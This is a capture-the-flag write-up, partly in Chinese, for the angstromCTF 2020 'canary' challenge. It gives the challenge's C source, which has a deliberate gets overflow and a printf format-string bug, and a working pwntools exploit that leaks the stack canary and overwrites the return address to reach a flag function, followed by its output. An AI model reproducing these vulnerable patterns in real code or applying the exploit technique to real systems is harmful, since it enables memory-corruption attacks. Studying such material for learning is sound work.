root@gavin:/home/gavin/angstromCTF2020# checksec ./canary
[*] '/home/gavin/angstromCTF2020/canary'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Canary源码如下:
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
void flag() {
system("/bin/cat flag.txt");
}
void wake() {
puts("Cock-a-doodle-doo! Cock-a-doodle-doo!\n");
puts(" .-\"-.");
puts(" / 4 4 \\");
puts(" \\_ v _/");
puts(" // \\\\");
puts(" (( ))");
puts("=======\"\"===\"\"=======");
puts(" |||");
puts(" '|'\n");
puts("Ahhhh, what a beautiful morning on the farm!");
puts("And my canary woke me up at 5 AM on the dot!\n");
puts(" _.-^-._ .--.");
puts(" .-' _ '-. |__|");
puts(" / |_| \\| |");
puts(" / \\ |");
puts(" /| _____ |\\ |");
puts(" | |==|==| | |");
puts(" | |--|--| | |");
puts(" | |==|==| | |");
puts("^^^^^^^^^^^^^^^^^^^^^^^^\n");
}
void greet() {
printf("Hi! What's your name? ");
char name[20];
gets(name);
printf("Nice to meet you, ");
printf(strcat(name, "!\n"));
printf("Anything else you want to tell me? ");
char info[50];
gets(info);
}
int main() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
wake();
greet();
}
from pwn import *
#sh=process('./canary')
sh=remote("shell.actf.co",20701)
#context.terminal=["/usr/bin/tmux","split-window","-h"]
#gdb.attach(sh)
sh.recvuntil("Hi! What's your name?")
sh.sendline("%17$lx abc")
canary=sh.recvuntil("abc")
canary=int(canary[19:35],16)
payload=p64(canary)*9
payload+=p64(0x400787)
sh.recvuntil("Anything else you want to tell me?")
sh.sendline(payload)
sh.interactive()
执行结果如下
root@gavin:/home/gavin/angstromCTF2020# python3 ./canary.py
[+] Opening connection to shell.actf.co on port 20701: Done
[*] Switching to interactive mode
actf{youre_a_canary_killer_>:(}
Segmentation fault
[*] Got EOF while reading in interactive
$
root@gavin:/home/gavin/angstromCTF2020# python3
Python 3.7.5 (default, Nov 20 2019, 09:21:52)
[GCC 9.2.1 20191008] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> buf="a"*10
>>> buf+=p64(0xdeadbeef)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: can only concatenate str (not "bytes") to str
>>>